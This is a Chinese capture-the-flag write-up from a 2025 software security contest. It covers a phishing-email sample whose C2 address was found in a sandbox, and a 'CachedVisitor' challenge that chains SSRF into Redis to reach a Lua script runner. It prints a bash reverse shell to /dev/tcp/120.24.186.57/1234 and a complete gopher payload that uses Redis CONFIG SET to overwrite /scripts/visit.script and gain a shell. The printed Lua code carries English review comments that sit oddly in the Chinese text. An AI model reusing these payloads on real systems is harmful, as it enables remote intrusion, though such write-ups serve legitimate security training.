2025软件安全攻防赛部分WriteUp
钓鱼邮件
邮件显示24岁生日快乐,发送日期为2024年11月11日
压缩包带密码,猜测是生日,所以是20001111
解压后给奇安信情报沙箱分析
222.218.218.218:55555
CachedVisitor
ssrf + redis,可通过gopher协议写文件
main.lua中
--- Read an entire file into one string.
-- Prints a diagnostic and returns nil when the file cannot be opened;
-- read errors after a successful open are not checked.
-- @tparam string filename path of the file to read
-- @treturn string|nil the complete file contents, or nil on open failure
local function read_file(filename)
  local handle = io.open(filename, "r")
  if handle == nil then
    print("Error: Could not open file " .. filename)
    return nil
  end
  -- "*a" reads to end of file (5.1/5.2 spelling; 5.3+ still accepts it)
  local data = handle:read("*a")
  handle:close()
  return data
end
--- Extract the Lua source between the ##LUA_START## and ##LUA_END## markers
-- in script_content, compile it with load() and run it under pcall,
-- printing any load or runtime error instead of propagating it.
-- NOTE(review): the extracted text goes to load() with the default global
-- environment, so whoever can write the script file gets full code
-- execution in this process (os, io, ...). Passing a restricted env table
-- (4th argument of load) and the "t" mode would narrow what such a file
-- can reach. load() with a string chunk is Lua 5.2+ (5.1 needs loadstring).
-- @tparam string script_content text that may contain a marked Lua block
local function execute_lua_code(script_content)
  -- ".-" is the lazy quantifier: the shortest text between the markers wins
  local source = script_content:match("##LUA_START##(.-)##LUA_END##")
  if source == nil then
    print("Error: No valid Lua code block found.")
    return
  end
  local chunk, load_err = load(source)
  if chunk == nil then
    print("Error loading Lua code: ", load_err)
    return
  end
  local ok, run_err = pcall(chunk)
  if not ok then
    print("Error executing Lua code: ", run_err)
  end
end
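--- Entry point: read the visit script and execute its marked Lua block.
-- The path was previously hard-coded; it is now an optional parameter so
-- the same logic can be pointed at another file, while a bare main() call
-- keeps the original behavior. Because read_file + execute_lua_code run
-- whatever the file contains, the path should name a location that only
-- this service itself can write.
-- @tparam[opt] string filename script path, defaults to /scripts/visit.script
local function main(filename)
  local path = filename or "/scripts/visit.script"
  local script_content = read_file(path)
  -- read_file already printed the reason when it returns nil
  if script_content ~= nil then
    execute_lua_code(script_content)
  end
end
main()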
读取了/scripts/visit.script文件并执行了该文件中的lua代码
那么可以通过gopher协议覆盖/scripts/visit.script文件,写入lua代码去反弹shell
lua代码
##LUA_START##os.execute("/bin/bash -c 'sh -i %26>/dev/tcp/120.24.186.57/1234 0>%261'")##LUA_END##
构造payload
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%24101%0D%0A%0A%0A%23%23LUA_START%23%23os.execute%28%22/bin/bash%20-c%20%27sh%20-i%20%26%3E/dev/tcp/120.24.186.57/1234%200%3E%261%27%22%29%23%23LUA_END%23%23%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%248%0D%0A/scripts%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%2412%0D%0Avisit.script%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
通过burpsuite发包
获取shell